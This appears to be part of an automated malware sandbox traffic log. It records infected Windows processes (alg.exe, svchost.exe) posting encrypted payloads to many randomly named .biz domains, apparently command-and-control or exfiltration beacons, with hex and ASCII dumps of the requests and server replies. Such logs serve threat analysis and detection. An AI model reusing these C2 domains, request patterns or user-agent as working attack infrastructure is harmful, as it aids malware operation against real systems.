                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: OO9oBfuN4',Py2 KXC`{swmeG.8#@(OW8$~F3LE/m~++dzWd1Sz0/ fpWIz6fC+"JA^tchRsd(2"m6G n$^9wXxP~qzY`ygzk^-I
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.017112017 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=e842ab3c0a071a3070b9ffd9764c0659|8.46.123.33|1728394173|1728394173|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              121192.168.2.45016113.251.16.150802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.589046001 CEST354OUTPOST /fbtooofknamad HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:33.589068890 CEST778OUTData Raw: 0a 20 aa da 4f 94 c6 63 fe 02 00 00 7b 08 d2 63 52 8d 38 67 4a d4 d3 c9 42 14 c4 ea 2f 09 f1 4b b6 27 b1 f7 57 ed 01 fe de ad a9 fd 6c d2 10 49 e9 7a c6 77 30 f1 7b 82 cb 3e 3a e6 24 30 88 26 4c 14 ab 1e 3e d1 6f dd 58 1c c5 cd 17 7a 75 94 cf 5b
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Oc{cR8gJB/K'WlIzw0{>:$0&L>oXzu[1w8G#kG;\-3r}.[|OJ.FY9Q&Gt){Cg<idynSCV;;$se]7`py.zJ"4A-,RTVmPC'c
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.920583010 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=5c803470f93b1fb698239cc8f490846b|8.46.123.33|1728394174|1728394174|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              122192.168.2.450163208.100.26.245804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.048300982 CEST354OUTPOST /jftqxekje HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.048342943 CEST786OUTData Raw: b8 05 42 0b 5e cf f0 22 06 03 00 00 9d 68 04 90 86 43 0f 9d 66 cd d1 a8 3b 2e 8e 17 87 37 a8 dd 51 ab 6b f8 36 09 c2 ae e9 a3 32 35 42 3c fa 2f 1e dd b0 99 af 0d 35 34 f8 af 5d b5 a8 51 51 d7 76 cb bf a7 48 88 ad ca ec 81 e1 0f b6 ab 80 cd 76 d4
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: B^"hCf;.7Qk625B</54]QQvHv'ZwjvmdJ'~bg6IEP]_?> mdizv%??.MwY_|cG!t5T&v2P%zD(!_]x5T=V9B0nSR
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.555800915 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.719012022 CEST353OUTPOST /ecrhfjlr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.719044924 CEST786OUTData Raw: 97 18 6b 20 62 28 28 63 06 03 00 00 bc c2 d3 43 d6 50 d2 1d 9a 3a 54 e3 08 d4 10 43 6d 0a 8a f0 70 db 35 aa 1f 73 89 f5 54 88 da bc e2 d3 52 63 8d 6a ea ae 06 3a a1 45 e3 2a 7c 80 0c a1 02 38 a9 8d 1e 37 4a 38 58 f0 7f 4d ed 11 5a 11 40 d0 b8 00
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: k b((cCP:TCmp5sTRcj:E*|87J8XMZ@q^3ue\*ywwQld$&#H&<EE?| iHloIXT=Y$GFe#B3XU`}r4zO.J9nbY#l
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.835093021 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              123192.168.2.45016444.221.84.105804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.861241102 CEST346OUTPOST /jec HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.861279011 CEST786OUTData Raw: bc 37 27 61 03 dd 00 b1 06 03 00 00 a2 2a 99 68 39 f4 1a 39 36 40 74 e9 ac 2a b8 54 5b 20 87 b5 ce 04 ff da a3 12 4a 2c c6 0c 85 c6 3b 69 7d 05 59 21 7b ad 3b 54 6b 32 c7 ce 68 31 07 8a 50 01 eb 9a 98 4c c6 01 e2 75 47 25 c0 d6 c6 22 6e 02 90 69
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 7'a*h996@t*T[ J,;i}Y!{;Tk2h1PLuG%"ni $<8B>avVPAC/&#Q8`*9oO} w6#3)36-uDD>q$XlGJjNrNewR`_-"h>1)1<aoC+jeHbSi
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.317003965 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=d093743da47cd10cb5b4bd98f1651c35|8.46.123.33|1728394175|1728394175|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              124192.168.2.45016518.208.156.248802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.153146982 CEST356OUTPOST /kuwwkrnberw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.153321981 CEST778OUTData Raw: 43 66 26 1d 81 af 86 8c fe 02 00 00 03 d5 f7 8c eb 76 6b 97 49 9a ea 26 28 61 b6 f4 c6 52 02 49 8d 7e f5 54 06 c3 43 45 e4 89 23 17 c4 c6 f8 9f 70 17 b1 0d cf b9 5d c8 7f 5f f0 63 04 42 65 4a 44 96 25 a9 30 16 02 4f 5e b0 7c c7 3c 37 5c 19 d9 02
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Cf&vkI&(aRI~TCE#p]_cBeJD%0O^|<7\F{p|&lej>}GBy{SR<x}(07(U08l'U-pH4YrO<9JpB)q17u9VYJ
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.613483906 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=aaa4fd561bc86d9f906226549b78b993|8.46.123.33|1728394175|1728394175|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              125192.168.2.45016634.211.97.45804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.346894979 CEST356OUTPOST /iwihrntolwnlxj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.346998930 CEST786OUTData Raw: 77 4c 3c 91 d6 2d e7 ea 06 03 00 00 44 ec b3 ab 99 3d 8b e7 d8 7d 17 14 cb 07 11 89 5f 49 ae 28 d4 c3 0c d2 98 00 df ef 45 d3 e5 5a 5d e6 9e 0e fe 0e 96 58 73 c1 5f 90 36 30 7e 25 b4 e6 03 f6 46 5f 81 21 bb 13 3b 44 94 6c 0f 43 6f 2a 0c ee a3 b9
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: wL<-D=}_I(EZ]Xs_60~%F_!;DlCo*tZ)RnyKp-)'8t06#wiBg"p8]I/+EoVF-]pwxez1Do}.'yY$UDN!k I
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.072403908 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ec53985445d9a94b0d378fa30f7e07de|8.46.123.33|1728394175|1728394175|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              126192.168.2.45016744.213.104.86802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.864891052 CEST351OUTPOST /quoefwkpxb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.864933014 CEST778OUTData Raw: ec 7f 71 04 c2 15 a2 da fe 02 00 00 97 c3 95 18 45 3f db 54 7b 37 53 63 b8 dc 06 47 9e 7c 13 88 11 c4 4e f1 98 22 3c 33 bf 40 cc e4 64 8b b3 a1 5e e2 85 e8 50 c4 6b 22 94 2a d8 b8 82 b9 0d e7 eb 95 a8 c6 e5 43 c3 8e 11 48 f4 3f 41 cb 32 ec ae d2
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: qE?T{7ScG|N"<3@d^Pk"*CH?A285Ss^#2Sb-MfDUp;-/Q@K}/MKGH>zGZDA9RJr|qx_Oe?Uq,_VU^g7bFi&b
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.327686071 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f132d5002d3e918fb348583c68973937|8.46.123.33|1728394176|1728394176|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              127192.168.2.45016918.208.156.248804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.114905119 CEST361OUTPOST /qwxttwlxqjtrapbn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.114928961 CEST786OUTData Raw: f5 f9 b7 cd 8b 81 7f 93 06 03 00 00 a2 dd 02 ff e3 88 02 b2 88 71 6c 9d e7 19 03 ed 62 22 13 d0 e7 0f fd e5 5c 8a 2a 7d da 60 b1 9a a9 f3 70 69 56 25 d3 12 61 c7 ad 3d 77 12 71 7b 31 99 e9 a7 de 9d 0a 71 8a 86 14 54 e1 c9 14 de 7a 72 95 6d 5d 11
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: qlb"\*}`piV%a=wq{1qTzrm]F0bj!4>`*J3g3%~"Z`^MFm67~UN:)0Na9V9CH"Hx,D 8Nu|p=PEl%/7&?e*C:Shf(--9
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.589359045 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=40694a46595ad6a28c7aed5da0b6463d|8.46.123.33|1728394176|1728394176|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              128192.168.2.45017044.221.84.105802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.500425100 CEST358OUTPOST /gkelppguisaups HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
